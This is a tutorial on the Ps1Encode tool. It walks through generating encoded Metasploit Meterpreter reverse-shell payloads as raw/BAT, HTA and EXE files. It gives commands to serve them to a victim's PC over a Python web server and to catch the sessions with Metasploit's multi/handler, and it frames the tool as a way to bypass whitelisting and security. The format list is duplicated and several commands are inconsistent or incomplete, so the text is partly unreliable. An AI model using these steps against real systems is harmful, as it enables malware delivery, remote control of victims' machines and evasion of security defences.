Generate Metasploit Payload with Ps1encode
In this article, we will learn
Ps1Encode tool and how to use it by generating malwares in different file
formats such as HTA, EXE, etc.
The working code of Ps1Encode is
developed by Matt Greaber, Dev Kennedy with few others. Ps1Encode is used to
generate a malicious payload in order to generate a meterpreter session. While
generating the payload, it will encode it too. It is a different way to bypass
Whitelisting and security on the target system. It's developed in ruby and
allows us to create series of payload which are based on Metasploit but can be
prepared in any format we desire. The final aim is to get a PowerShell running
and execute our payload through it.
There are various formats for our
malwares that are supported by Ps1Encode are the following :
raw (encoded payload only - no powershell run
· cmd (for use with bat files)
· vba (for use with macro trojan docs)
· vbs (for use with vbs scripts)
· war (tomcat)
· exe (executable) requires MinGW - x86_64-w64-mingw32-gcc [apt-get install mingw-w64]
· java (for use with malicious java applets)
· js (javascript)
· js-rd32 (javascript called by rundll32.exe)
· php (for use with php pages)
· hta (HTML applications)
· cfm (for use with Adobe ColdFusion)
· aspx (for use with Microsoft ASP.NET)
· lnk (windows shortcut - requires a webserver to stage the payload)
· sct (COM scriptlet - requires a webserver to stage the payload)
· cmd (for use with bat files)
· vba (for use with macro trojan docs)
· vbs (for use with vbs scripts)
· war (tomcat)
· exe (executable) requires MinGW - x86_64-w64-mingw32-gcc [apt-get install mingw-w64]
· java (for use with malicious java applets)
· js (javascript)
· js-rd32 (javascript called by rundll32.exe)
· php (for use with php pages)
· hta (HTML applications)
· cfm (for use with Adobe ColdFusion)
· aspx (for use with Microsoft ASP.NET)
· lnk (windows shortcut - requires a webserver to stage the payload)
· sct (COM scriptlet - requires a webserver to stage the payload)
You can download Ps1Encode from here using git clone
command as shown in the image below :
Once it’s downloaded, let’s use
the help command to check the syntax that we have to use. Use the following set
of commands for that :
cd ps1encode/
./ps1encode.rc -h
Following are the syntaxes that
we can use :
-i : defines local host IP
-p : defines local host port
-a : defines payload value
-t : defines output format
Now, we will generate a malicious
raw file using the following command :
./ps1encode.rb -I -p 8000 -a
Copy the code generated using the
above command in the file with the extension.bat. and the share it by using
python server. You can start the server using the following command :
python -m SimpleHTTPServer 80
Simultaneously, start the multi
handler to have a session with the following set of commands :
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost
lport 8000
Once the file is executed in the
victims’ PC, you will have your session as shown in the image above. Now we
will generate our malware in the form of HTA file. Use the following command to
generate the HTA file :
./ps1encode.rb -i -p 4444 -a windows/meterpreter/reverse_tcp
-t hta
Following script will be created
due to the above command, send this file to the victim’s PC using python server
like before.
Simultaneously, start the multi
handler to have a session with the following set of commands :
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost
lport 8000
Once the file is executed in the
victims’ PC, you will have your session as shown in the image above. Now we
will try and generate an EXE file with the following :
./ps1encode -i -p 4444 -a windows/meterpreter/reverse_tcp
-t exe
Send this file to the victim’s PC
using python server like before a shown in the image above. Simultaneously,
start the multi handler to have a session with the following set of commands :
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost
lport 8000
This way, you can use Ps1Encode
to generate files in any format. As you can see, its pretty simple and
convenient along with being user-friendly. Possibilities with Ps1Encode are
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